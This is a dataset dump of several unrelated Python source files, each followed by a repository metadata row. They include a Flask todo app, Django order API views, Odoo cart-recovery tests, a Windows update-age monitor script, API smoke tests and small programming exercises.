def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.switchVisualMode(self.mode, self.skipHide)
self.end()
class PlayNPCEmote(DialogProcess):
DataSet = {
'emoteId': None,
'npcId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
if self.npcId:
npcDoId = base.cr.uidMgr.getDoId(self.npcId)
self.npc = base.cr.doId2do.get(npcDoId)
self.npc.gameFSM.request('Emote')
self.npc.playEmote(self.emoteId)
self.end()
class PlayPlayerEmote(DialogProcess):
DataSet = {
'emoteId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
localAvatar.playEmote(self.emoteId)
self.end()
class PlayerDrawPistolAndAim(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
weaponId = 2001
Pistol = Pistol
import pirates.battle
localAvatar.dialogProp = Pistol.Pistol(weaponId)
self.animIval = Sequence(localAvatar.dialogProp.getDrawIval(localAvatar), Func(localAvatar.loop, 'gun_aim_idle'), Func(self.end)).start()
def end(self):
if self.animIval:
self.animIval.pause()
self.animIval = None
DialogProcess.end(self)
def cleanup(self):
if localAvatar.dialogProp:
localAvatar.dialogProp.detachNode()
class PlayerHidePistol(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.animIval = None
if localAvatar.dialogProp:
self.animIval = Sequence(localAvatar.dialogProp.getReturnIval(localAvatar), Func(localAvatar.loop, 'idle'), Func(self.end)).start()
else:
self.end()
def end(self):
if self.animIval:
self.animIval.pause()
self.animIval = None
localAvatar.dialogProp = None
DialogProcess.end(self)
class PlayChickenFly(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.npc.play('fly', startFrame = 20)
self.end()
class PlaySfx(DialogProcess):
DataSet = {
'sfxId': None }
sfxList = {
SoundGlobals.SFX_SKILL_CLEANSE: loadSfx(SoundGlobals.SFX_SKILL_CLEANSE) }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
sfx = self.sfxList.get(self.sfxId)
base.playSfx(sfx, volume = 0.75)
self.end()
| [
"[email protected]"
] | |
d22cf8a285c59ddf0e21693168cc10d8de3a8edf | 0729155365ebd2e8761068bda78060f0c2d6e6a7 | /Class And Object Programs/3__Calculate the Area and Perimeter of Circle Using The Class.py | 412cc99095898ee61f62e70e3823075e3ba7c024 | [] | no_license | mukeshrock7897/Class-And-Object-Programs | a0ce41b19ebdd87bb037ca742069f98c59c21847 | a6cf378ab4c5a3d95a46867b5414b44955838782 | refs/heads/master | 2020-04-24T05:04:53.234277 | 2019-02-20T18:10:25 | 2019-02-20T18:10:25 | 171,724,815 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | import math
class Circle:
    """A circle described by its radius, with area and perimeter queries."""

    def __init__(self, radius):
        # The radius is stored exactly as supplied by the caller.
        self.radius = radius

    def area(self):
        """Return the enclosed area, pi * r**2."""
        r_squared = self.radius ** 2
        return math.pi * r_squared

    def perimeter(self):
        """Return the circumference, 2 * pi * r."""
        circumference = 2 * math.pi * self.radius
        return circumference
radius=int(input("Enter The Radius Of Circle::"))
obj=Circle(radius)
print("Area Of Circle::",round(obj.area(),2))
print("Perimeter of Circle::",round(obj.perimeter(),2))
| [
"[email protected]"
] | |
e0004b0b6df60bd3030ff004ed0bbefc869e38b4 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/minimum-string-length-after-removing-substrings.py | 48bab73ecbf57ba9c36b9cfb91378585932a9056 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 381 | py | # Time: O(n)
# Space: O(n)
# stack
class Solution(object):
    def minLength(self, s):
        """
        :type s: str
        :rtype: int
        """
        # Scan left to right keeping the surviving characters on a stack;
        # whenever the current character closes an "AB" or "CD" pair with
        # the stack top, both characters vanish.
        remaining = []
        removable = {('A', 'B'), ('C', 'D')}
        for ch in s:
            if remaining and (remaining[-1], ch) in removable:
                remaining.pop()
            else:
                remaining.append(ch)
        return len(remaining)
| [
"[email protected]"
] | |
606477f67edd3313746f9af6bd76d0bcc0b0f20d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_salaams.py | 1de6f8529dce67507995a11f6402f5e970de1ab1 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
#calss header
class _SALAAMS():
    """Word-form record for "salaams", a form of the base word "salaam"."""

    def __init__(self,):
        self.name = "SALAAMS"
        # Bug fix: `salaam` was an unquoted bare name, so constructing the
        # class raised NameError.  The base-form string was intended.
        self.definitions = 'salaam'
        self.parents = []
        self.childen = []  # (sic) attribute name kept for compatibility
        self.properties = []
        self.jsondata = {}
        self.basic = ['salaam']
| [
"[email protected]"
] | |
e0a001fca791b06a772558c84bf3d8c100a2c4dd | ba3a705ecb3628641793854292aa9a3ff8fc1221 | /10_API/FlaskIntroduction/app.py | 0a23ab3144d2a8d92dd00599475768d8da80d806 | [] | no_license | mortenhaahr/NGK | d98ada8d63a07ea6447768ab6a23ad1346634b56 | a9e89afb452dd7953cba4403b4e8bc2c0ff2ba1e | refs/heads/master | 2022-07-01T20:39:02.063251 | 2020-05-11T15:40:26 | 2020-05-11T15:40:26 | 242,725,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | from flask import Flask, render_template, url_for, request, redirect
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
app = Flask(__name__) #__name__ = filename
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db' # 3 forward slashes for relative path
db = SQLAlchemy(app) # Pass in app to database and init db
class Todo(db.Model):
    """One to-do task row in the SQLite database."""
    id = db.Column(db.Integer, primary_key=True)
    # Task text: at most 200 characters and may not be blank.
    content = db.Column(db.String(200), nullable=False)
    # Stamped automatically at insert time; never set manually.
    date_created = db.Column(db.DateTime, default=datetime.utcnow)

    def __repr__(self):
        # Bug fix: the closing '>' was missing from the repr format string.
        return '<Task %r>' % self.id
#Must setup database manually in python ONCE, to create the db in env:
# Type following in console:
# python3 [enter] from app import db [enter] db.create_all() [enter] exit() [enter]
@app.route('/', methods=['POST', 'GET'])  # root route accepts both GET and POST
def index():
    """Home page: list every task (GET) or create a new one (POST)."""
    if request.method == 'POST':
        # Form submission: build a Todo from the 'content' field.
        task_content = request.form['content']
        new_task = Todo(content=task_content)
        try:
            db.session.add(new_task)
            db.session.commit()
            return redirect('/')
        except:
            return 'There was an issue adding your task'
    else:
        # GET: show all tasks, oldest first.
        tasks = Todo.query.order_by(Todo.date_created).all()
        return render_template('index.html', tasks=tasks)
# make delete route
@app.route('/delete/<int:id>')
def delete(id):
    """Remove the task with the given id, then return to the task list."""
    # 404 immediately if no such row exists.
    doomed = Todo.query.get_or_404(id)
    try:
        db.session.delete(doomed)
        db.session.commit()
        return redirect('/')
    except:
        return 'There was a problem deleting that task'
@app.route('/update/<int:id>', methods=['GET', 'POST'])
def update(id):
    """Show the edit form (GET) or apply an edit (POST) for one task."""
    task = Todo.query.get_or_404(id)
    if request.method != 'POST':
        # GET: render the edit form pre-filled with the task.
        return render_template('update.html', task=task)
    # POST: overwrite the task text with the submitted content.
    task.content = request.form['content']
    try:
        db.session.commit()
        return redirect('/')
    except:
        return 'There was an issue updating your task'
if __name__ == "__main__":
app.run(debug=True) | [
"[email protected]"
] | |
393267ba2fca5a36bba7334d69ab49829c14bc68 | 84d84096b413e84f502468a2985780a3005457a1 | /api/orders/views.py | 1daaf6e39ac7835363150b9c1afaa1afd0c60dcf | [
"MIT"
] | permissive | joeltio/np-train | 0fd28fe45bdc9c29aee99819ca07798392e13fd1 | dc852321b674be3ddc1d1c0dd4eff694825d02fa | refs/heads/master | 2020-04-14T18:56:57.714933 | 2019-01-10T01:58:09 | 2019-01-10T01:58:09 | 164,039,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,984 | py | import json
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from orders.models import Order
import base.helpers as base_helpers
@csrf_exempt
@require_POST
def uncompleted_order(request):
    """POST endpoint: return the oldest order still awaiting processing.

    Responds with the order's JSON representation, or an empty-data
    message when no NOT_ACTIVE order exists.
    """
    # Oldest (lowest id) order still in the NOT_ACTIVE state.
    order = Order.objects.filter(
        status=Order.STATUS_NOT_ACTIVE).order_by("id").first()
    if order is not None:
        return base_helpers.create_json_response(
            data=order.as_json()
        )
    else:
        return base_helpers.create_json_response(
            message="There are no uncompleted orders",
            empty_data=True,
        )
@csrf_exempt
@require_POST
def new_order(request):
    """POST endpoint: create an order from {"destination": str, "color": int}.

    Returns {"id": <pk>} of the new NOT_ACTIVE order, or a 400 JSON
    response when the body is malformed.
    """
    # Read json
    try:
        json_data = json.loads(request.body)
    except json.decoder.JSONDecodeError:
        return base_helpers.create_json_response(
            success=False,
            message="Bad JSON",
            status=400
        )
    # Check if there is a destination and color
    if not base_helpers.has_keys({"destination", "color"}, json_data):
        return base_helpers.create_json_response(
            success=False,
            message="Missing destination or color",
            status=400,
        )
    destination = json_data["destination"]
    color = json_data["color"]
    # Color is an index, so zero is a valid value.
    if not base_helpers.validate_positive_int(color, include_zero=True):
        return base_helpers.create_json_response(
            success=False,
            message="The color is not a non-negative integer",
            status=400,
        )
    if not isinstance(destination, str):
        return base_helpers.create_json_response(
            success=False,
            message="The destination must be a string",
            status=400,
        )
    # New orders always start in the NOT_ACTIVE state.
    order = Order.objects.create(
        destination=destination, color=color,
        status=Order.STATUS_NOT_ACTIVE)
    return base_helpers.create_json_response(
        data={"id": order.pk}
    )
@csrf_exempt
@require_POST
def update_order(request):
    """POST endpoint: advance an order's status by exactly one step.

    Expects {"id": <non-negative int>, "new_status": <member of
    Order.STATUS_FLOW>}.  Statuses may only move forward one step at a
    time (NOT_ACTIVE -> ACTIVE -> COMPLETED); anything else is a 400.
    """
    # Read json
    try:
        json_data = json.loads(request.body)
    except json.decoder.JSONDecodeError:
        return base_helpers.create_json_response(
            success=False,
            message="Bad JSON",
            status=400
        )
    if not base_helpers.has_keys({"id", "new_status"}, json_data):
        return base_helpers.create_json_response(
            success=False,
            message="Missing id or new_status",
            status=400,
        )
    if not base_helpers.validate_positive_int(
            json_data["id"], include_zero=True):
        return base_helpers.create_json_response(
            success=False,
            message="Bad id",
            status=400,
        )
    elif not json_data["new_status"] in Order.STATUS_FLOW:
        return base_helpers.create_json_response(
            success=False,
            message="Bad new_status",
            status=400,
        )
    new_status = json_data["new_status"]
    # Find the order
    try:
        order = Order.objects.get(pk=int(json_data["id"]))
    except Order.DoesNotExist:
        return base_helpers.create_json_response(
            success=False,
            message="There is no order with that id",
            status=400,
        )
    # Only allow changes in this order:
    # NOT_ACTIVE > ACTIVE > COMPLETED
    if order.status == Order.STATUS_FLOW[-1]:
        # Already at the terminal status; nothing follows COMPLETED.
        return base_helpers.create_json_response(
            success=False,
            message="The order is already complete",
            status=400,
        )
    elif new_status - order.status != 1:
        # Statuses are consecutive values, so "one step forward" means a
        # numeric difference of exactly 1.
        return base_helpers.create_json_response(
            success=False,
            message="Cannot update status beyond 1 step",
            status=400,
        )
    order.status = new_status
    order.save()
    return base_helpers.create_json_response()
@csrf_exempt
@require_POST
def order_status(request):
    """POST endpoint: report the status of one order.

    Expects a JSON body {"id": <non-negative int>} and returns
    {"status": <order.status>}; replies 400 with a message on malformed
    input or an unknown id.
    """
    # Read json
    try:
        json_data = json.loads(request.body)
    except json.decoder.JSONDecodeError:
        return base_helpers.create_json_response(
            success=False,
            message="Bad JSON",
            status=400
        )
    if "id" not in json_data:
        return base_helpers.create_json_response(
            success=False,
            message="Missing id",
            status=400,
        )
    if not base_helpers.validate_positive_int(
            json_data["id"], include_zero=True):
        return base_helpers.create_json_response(
            success=False,
            message="Bad id",
            status=400,
        )
    # Get the order.  Cast the id with int() for consistency with
    # update_order, which accepts validated numeric strings as well.
    try:
        order = Order.objects.get(pk=int(json_data["id"]))
    except Order.DoesNotExist:
        return base_helpers.create_json_response(
            success=False,
            message="There is no order with that id",
            status=400,
        )
    return base_helpers.create_json_response(
        data={"status": order.status}
    )
| [
"[email protected]"
] | |
3dcadaa240a921e97bab29a8008a1b83bac8c93d | f3081f31875dc539529d1ef24a6ddedbb1cd5ad3 | /website_sale/tests/test_website_sale_cart_recovery.py | ac597616882ce66ce7ca4ffa447974a46ef75571 | [] | no_license | babarlhr/human_website_13 | 5ef144c65c8eb268b40c144e0073d8d2084014ed | e9d68d29959a7df3f56eadebe413556b11957ace | refs/heads/master | 2022-11-06T09:02:17.301645 | 2020-06-21T10:32:16 | 2020-06-21T10:32:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,475 | py | # -*- coding: utf-8 -*-
# Part of Eagle. See LICENSE file for full copyright and licensing details.
from eagle.tests import tagged
from eagle.tests.common import HttpCase, TransactionCase
@tagged('post_install', '-at_install')
class TestWebsiteSaleCartRecovery(HttpCase):
    """Browser (tour) test for the abandoned-cart recovery flow."""

    def test_01_info_cart_recovery_tour(self):
        """The goal of this test is to make sure cart recovery works."""
        self.start_tour("/", 'info_cart_recovery', login="portal")
@tagged('post_install', '-at_install')
class TestWebsiteSaleCartRecoveryServer(TransactionCase):
    """Server-side tests for abandoned-cart recovery e-mails:
    per-website template selection and the actual send."""

    def setUp(self):
        res = super(TestWebsiteSaleCartRecoveryServer, self).setUp()
        # One customer shared by all carts.
        self.customer = self.env['res.partner'].create({
            'name': 'a',
            'email': '[email protected]',
        })
        # The stock recovery template plus two website-specific copies.
        self.recovery_template_default = self.env.ref('website_sale.mail_template_sale_cart_recovery')
        self.recovery_template_custom1 = self.recovery_template_default.copy()
        self.recovery_template_custom2 = self.recovery_template_default.copy()
        # Three websites, each wired to its own recovery template.
        self.website0 = self.env['website'].create({
            'name': 'web0',
            'cart_recovery_mail_template_id': self.recovery_template_default.id,
        })
        self.website1 = self.env['website'].create({
            'name': 'web1',
            'cart_recovery_mail_template_id': self.recovery_template_custom1.id,
        })
        self.website2 = self.env['website'].create({
            'name': 'web2',
            'cart_recovery_mail_template_id': self.recovery_template_custom2.id,
        })
        # One abandoned cart per website; none has been mailed yet.
        self.so0 = self.env['sale.order'].create({
            'partner_id': self.customer.id,
            'website_id': self.website0.id,
            'is_abandoned_cart': True,
            'cart_recovery_email_sent': False,
        })
        self.so1 = self.env['sale.order'].create({
            'partner_id': self.customer.id,
            'website_id': self.website1.id,
            'is_abandoned_cart': True,
            'cart_recovery_email_sent': False,
        })
        self.so2 = self.env['sale.order'].create({
            'partner_id': self.customer.id,
            'website_id': self.website2.id,
            'is_abandoned_cart': True,
            'cart_recovery_email_sent': False,
        })
        return res

    def test_cart_recovery_mail_template(self):
        """Make sure that we get the correct cart recovery templates to send."""
        self.assertEqual(
            self.so1._get_cart_recovery_template(),
            self.recovery_template_custom1,
            "We do not return the correct mail template"
        )
        self.assertEqual(
            self.so2._get_cart_recovery_template(),
            self.recovery_template_custom2,
            "We do not return the correct mail template"
        )
        # Orders that belong to different websites; we should get the default template
        self.assertEqual(
            (self.so1 + self.so2)._get_cart_recovery_template(),
            self.recovery_template_default,
            "We do not return the correct mail template"
        )

    def test_cart_recovery_mail_template_send(self):
        """The goal of this test is to make sure cart recovery works."""
        orders = self.so0 + self.so1 + self.so2
        # Preconditions: nothing sent yet, no access tokens generated.
        self.assertFalse(
            any(orders.mapped('cart_recovery_email_sent')),
            "The recovery mail should not have been sent yet."
        )
        self.assertFalse(
            any(orders.mapped('access_token')),
            "There should not be an access token yet."
        )
        orders._cart_recovery_email_send()
        self.assertTrue(
            all(orders.mapped('cart_recovery_email_sent')),
            "The recovery mail should have been sent."
        )
        self.assertTrue(
            all(orders.mapped('access_token')),
            "All tokens should have been generated."
        )
        # Collect the outgoing mail created for each order by record name.
        sent_mail = {}
        for order in orders:
            mail = self.env["mail.mail"].search([
                ('record_name', '=', order['name'])
            ])
            sent_mail.update({order: mail})
        self.assertTrue(
            all(len(sent_mail[order]) == 1 for order in orders),
            "Each cart recovery mail has been sent exactly once."
        )
        self.assertTrue(
            all(order.access_token in sent_mail[order].body for order in orders),
            "Each mail should contain the access token of the corresponding SO."
        )
| [
"[email protected]"
] | |
51a07e0d65cb1b371d2bd13a78da51bcdb23a186 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_OSPF/test_c140943.py | 12482ba174a604d783884977f16e6d32bb34b597 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py |
import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_ospf import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_physical_interface import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
test_id = 140943
def test_c140943(browser):
    """OSPF general-settings validation (TestRail case 140943): entering a
    static metric of 16777215 with a manual router id must trigger the
    "number input error" browser alert; the device is then restored to
    auto router-id and OSPF is stopped."""
    try:
        login_web(browser, url=dev1)
        start_ospf_jyl(browser)
        time.sleep(0.5)
        ospf_general_jyl(browser, route_id="manual", manual_ip="192.168.1.1", static="yes", static_num="16777215", save="yes")
        alert = browser.switch_to_alert()
        # print(alert.text)
        web_info = alert.text
        # print(web_info)
        # Accept (dismiss) the warning alert.
        browser.switch_to_alert().accept()
        ospf_general_jyl(browser, route_id="auto", static="no", save="yes")
        stop_ospf_jyl(browser)
        # The alert text must contain the Chinese "number input error"
        # message; record pass/fail in TestRail either way.
        try:
            assert "输入数字错误" in web_info
            rail_pass(test_run_id, test_id)
        except:
            rail_fail(test_run_id, test_id)
            assert "输入数字错误" in web_info
    except Exception as err:
        # On any failure above: log it, reboot the device to restore its
        # configuration, mark the TestRail run failed, and fail the test.
        print(err)
        reload(hostip=dev1)
        rail_fail(test_run_id, test_id)
        assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"[email protected]"
] | |
5d635a8b03cfb360411bed2715e152f9905483f0 | 399dae0b5ad9ca27cde175d25b5435958674eb50 | /Script Monitors/Generates Alert if Windows Update is not Downloaded for 60 Days/generates-alert-if-windows-update-is-not-downloaded-for-60-days.py | 1cf0fac3bd8feb56d27fbdf8ec5719d79ccc253a | [] | no_license | kannanch/pythonscripts | 61e3ea9e8ebf6a6b0ec2a4a829664e4507b803ba | 843a522236f9c2cc2aadc68d504c71bb72600bd9 | refs/heads/master | 2020-06-12T11:18:00.404673 | 2019-06-28T11:24:37 | 2019-06-28T11:24:37 | 194,282,297 | 1 | 0 | null | 2019-06-28T13:55:56 | 2019-06-28T13:55:56 | null | UTF-8 | Python | false | false | 2,778 | py | # The script is a template to check UAC status on device.
import os
import sys
import _winreg
def alert(arg):
    # Monitor verdict for the RMM agent: the status digit is emitted on
    # stderr three times, e.g. alert(1) -> "111", alert(0) -> "000".
    sys.stderr.write(("%d" % arg) * 3)
vbs=r'''
Set objSession = CreateObject("Microsoft.Update.Session")
Set objSearcher = objSession.CreateUpdateSearcher
Set colHistory = objSearcher.QueryHistory(0, 1)
For Each objEntry in colHistory
Wscript.Echo "Title: " & objEntry.Title
Wscript.Echo "Update application date: " & objEntry.Date
Next
'''
import os
import ctypes
import re
class disable_file_system_redirection:
    """Context manager that turns off WOW64 file-system redirection.

    On 64-bit Windows a 32-bit process has System32 transparently
    redirected to SysWOW64; disabling redirection while running
    cscript.exe lets the script reach the native 64-bit binary.
    Windows-only: references ctypes.windll at class-definition time.
    """
    _disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
    _revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
    def __enter__(self):
        self.old_value = ctypes.c_long()
        self.success = self._disable(ctypes.byref(self.old_value))
    def __exit__(self, type, value, traceback):
        # Only restore redirection if disabling it succeeded.
        if self.success:
            self._revert(self.old_value)
def runvbs(vbs):
    """Write *vbs* to a temporary .vbs file under %PROGRAMDATA%\\temp,
    run it with cscript.exe and return the captured stdout.  The
    temporary script file is deleted afterwards."""
    temp_dir = os.environ['PROGRAMDATA'] + r'\temp'
    script_path = temp_dir + r'\temprun.vbs'
    if not os.path.isdir(temp_dir):
        os.mkdir(temp_dir)
    with open(script_path, "w") as script_file:
        script_file.write(vbs)
    # Disable WOW64 redirection so the native 64-bit cscript.exe runs.
    with disable_file_system_redirection():
        output = os.popen('cscript.exe "' + script_path + '"').read()
    if os.path.isfile(script_path):
        os.remove(script_path)
    return output
# ---- main script (Python 2) -------------------------------------------
# Run the VBScript, parse the date of the most recent applied update out
# of its output, compare it with today, and alert if it is 60+ days old.
output=runvbs(vbs)
# The date substring is the second space-separated token of the line
# "Update application date: <date> <time> ...".
sam=re.findall("Update\sapplication\sdate:(.*)",output)[0]
sam1=sam.split(' ')[1]
d1=sam1
import platform
ki=platform.platform()
# Normalise d1 into a zero-padded "x/y/YYYY" string.  The branches swap
# day and month depending on Windows version / process bitness, which
# looks locale-dependent -- NOTE(review): confirm on non-US locales.
if "Windows-8" in ki:
    print "Win 8"
    f = d1.split("/")
    d1=f[1] + "/" + f[0].rjust(2,"0") + "/" + f[2].rjust(2,"0")
elif "Windows-10" in ki:
    print "win 10"
    # PROCESSOR_ARCHITEW6432 is only set for a 32-bit process running
    # on 64-bit Windows.
    if 'PROCESSOR_ARCHITEW6432' in os.environ:
        f = d1.split("/")
        d1=f[1] + "/" + f[0].rjust(2,"0") + "/" + f[2].rjust(2,"0")
    else:
        f = d1.split("/")
        d1=f[0] + "/" + f[1].rjust(2,"0") + "/" + f[2].rjust(2,"0")
elif "Windows-7" in ki:
    print "windows 7"
    f = d1.split("/")
    d1=f[1] + "/" + f[0].rjust(2,"0") + "/" + f[2].rjust(2,"0")
import time
d2=time.strftime("%d/%m/%Y")  # today's date, day-first
from datetime import datetime
date_format = "%d/%m/%Y"
date_format1= "%m/%d/%Y"
# Windows 10 dates are parsed month-first, all others day-first.
if "Windows-10" in ki:
    a = datetime.strptime(d1, date_format1)
    b = datetime.strptime(d2, date_format)
    delta = b - a
else:
    a = datetime.strptime(d1, date_format)
    b = datetime.strptime(d2, date_format)
    delta = b - a
print str(delta.days) + " days Since the last update"
# Threshold: 60 or more days without an applied update raises the alert.
if delta.days >=60:
    print "Updates are not working properly"
    alert(1)
else:
    print "Updates are perfectly working"
    alert(0)
| [
"[email protected]"
] | |
c2321c30432183d23b15ae143923eaf6ad07ae89 | 7cdb18e0a7ef01a34ec602bb31aa915c482fcd24 | /hujian_api/API_service/Course/c_class.py | 3025bce96eba7f43eb8eea3acbd91dd212fd1b56 | [] | no_license | wangdan377/Python_API | 6adac56974f9c6af238895a3101db0e3f0667ba1 | 38b31d4d02740d359a7e47fb3a3975045f00288e | refs/heads/master | 2023-02-18T14:39:03.009815 | 2021-01-20T12:59:52 | 2021-01-20T12:59:52 | 311,855,608 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,712 | py | import pytest
import allure
import requests
import json
import time
import random
from Common import Post
from Common import Get
from Common import Assert
from Common import Consts
class Editor_filter:
    """Smoke checks for the course/music HTTP API.

    Every method opens a fresh ``requests`` session, calls one endpoint,
    asserts the HTTP status code is 200 and that the response text
    contains '成功' ("success"), then appends 'True' to
    ``Consts.RESULT_LIST`` for the result tally.

    Change vs. original: removed the dead locals ``times`` and
    ``rNumber`` (computed from time/random but never used).
    """

    def filter_00(self):
        """Log in with the fixed test account and return the session."""
        sessionX = requests.session()
        post_req = Post.Post()
        ass = Assert.Assertions()
        url = 'http://47.99.180.185:3999/login'
        params = {'username':'[email protected]', 'password':'helloworld'}
        res = post_req.post_model_b(sessionX, url, params)
        resCode = res['code']
        resText = res['text']
        assert ass.assert_code(resCode, 200)
        assert ass.assert_in_text(resText, '成功')
        Consts.RESULT_LIST.append('True')
        return sessionX

    def filter_01(self):
        """Fetch the tutorial category list for productId=3."""
        sessionX = requests.session()
        get_req = Get.Get()
        ass = Assert.Assertions()
        url = 'http://47.99.180.185:2999/v1/courses/getProductType?lang=zh_cn&productId=3'
        res = get_req.get_model_a(sessionX, url)
        print(res)
        resCode = res['code']
        resText = res['text']
        assert ass.assert_code(resCode, 200)
        assert ass.assert_in_text(resText, '成功')
        Consts.RESULT_LIST.append('True')

    def filter_02(self, id):
        """Fetch page 1 of the items under album/category *id*."""
        sessionX = requests.session()
        get_req = Get.Get()
        ass = Assert.Assertions()
        url = 'http://47.99.180.185:2999/v1/music/list?page=1&pageSize=10&albumId='+id
        res = get_req.get_model_a(sessionX, url)
        print(res)
        resCode = res['code']
        resText = res['text']
        assert ass.assert_code(resCode, 200)
        assert ass.assert_in_text(resText, '成功')
        Consts.RESULT_LIST.append('True')

    def filter_03(self):
        """Fetch page 1 of the hot list.

        NOTE(review): the original comment said "product manuals" but
        the endpoint is /v1/music/hot/list -- confirm which is intended.
        """
        sessionX = requests.session()
        get_req = Get.Get()
        ass = Assert.Assertions()
        url = 'http://47.99.180.185:2999/v1/music/hot/list?page=1&pageSize=10'
        res = get_req.get_model_a(sessionX, url)
        print(res)
        resCode = res['code']
        resText = res['text']
        assert ass.assert_code(resCode, 200)
        assert ass.assert_in_text(resText, '成功')
        Consts.RESULT_LIST.append('True')

    # Endpoints not yet covered (from the original TODO comments):
    #  - query the tutorial products currently published
    #  - fuzzy-search categories
    #  - fetch the videos under a category
    #  - fetch the zfilm home-page category list
if __name__ == '__main__':
    # Ad-hoc manual run: list the items under albumId 62.
    a = Editor_filter()
    a.filter_02('62')
| [
"[email protected]"
] | |
72a060428592795437ae3329b7ec56762c28a05b | 7275f7454ce7c3ce519aba81b3c99994d81a56d3 | /Programming-Collective-Intelligence/ch07/main.py | cea965bec22a5c20cdc4081bc9c0948547ffe229 | [] | no_license | chengqiangaoci/back | b4c964b17fb4b9e97ab7bf0e607bdc13e2724f06 | a26da4e4f088afb57c4122eedb0cd42bb3052b16 | refs/heads/master | 2020-03-22T08:36:48.360430 | 2018-08-10T03:53:55 | 2018-08-10T03:53:55 | 139,777,994 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | import treepredict
# Demo driver for the ch.07 decision-tree module (treepredict): builds a
# tree from the chapter's sample data and prints it.  The commented-out
# sections exercise the remaining chapter features (divideset, JPEG
# rendering, classify/prune, and the deprecated Zillow/HotOrNot APIs).
# main function
# print('<----DivideSet---->')
# for item in treepredict.divideset(treepredict.my_data, 2, 'yes'):
#     print(item)
#
print('\n<----Build and Display the Tree---->')
tree = treepredict.buildtree(treepredict.my_data)
treepredict.printtree(tree)
#
# print('\n<----Graphical Display---->')
# path = 'output/treeview.jpg'
# treepredict.drawtree(tree, jpeg=path)
# print("picture has been saved in " + path)
#
# print('\n<----Classify and prune---->')
# test = ['(direct)', 'USA', 'yes', 5]
# print(test)
# print(treepredict.classify(test, tree), '\n')
#
# print('Before pune:')
# treepredict.printtree(tree)
# treepredict.prune(tree, 1.0)
# print('\nAfter pune:')
# treepredict.printtree(tree)
# print('<----Zillow API---->')
# import zillow
# # housedata = zillow.getpricelist()
# # print('house data saved!')
# housedata = zillow.getdata('input/housedata.txt')
# print('house data read!')
# housetree = treepredict.buildtree(housedata, scoref=treepredict.variance)
# treepredict.printtree(housetree)
# treepredict.drawtree(housetree, 'output/housetree.jpg')
# HotOrNot API is deprecated since 2008
| [
"[email protected]"
] | |
ada9eb0e3ce075ebc01f1203fd530aaf833dafc4 | 4bdb8e324a833c10380bb7b1f436d1e9629c873c | /Ekeopara_Praise/Phase 1/Python Basic 1/Day2 Tasks/Task 5.py | 1d1d5cde955ffa3a4b7be09d0ba0fa45cd7803f2 | [
"MIT"
] | permissive | dreamchild7/python-challenge-solutions | e3831a57447f6132dd098be8b941cc27db92ace2 | 29e2ca780e86fc8a3e9d4def897c26bfa6d6493d | refs/heads/master | 2022-11-08T17:23:57.763110 | 2020-06-19T08:38:20 | 2020-06-19T08:38:20 | 263,923,130 | 0 | 0 | MIT | 2020-05-14T13:29:33 | 2020-05-14T13:29:32 | null | UTF-8 | Python | false | false | 253 | py | #5. Write a Python program which accepts the user's first and last name and print them in reverse order with a space between them.
# Accept the user's first and last name and print them in reverse order
# (last name first) separated by a space.
# Fix: input() already returns a str in Python 3, so the redundant
# str() wrappers were removed.
f_name = input("Enter your first name: ")
l_name = input("Enter your last name: ")
print(f"{l_name} {f_name}")
"[email protected]"
] | |
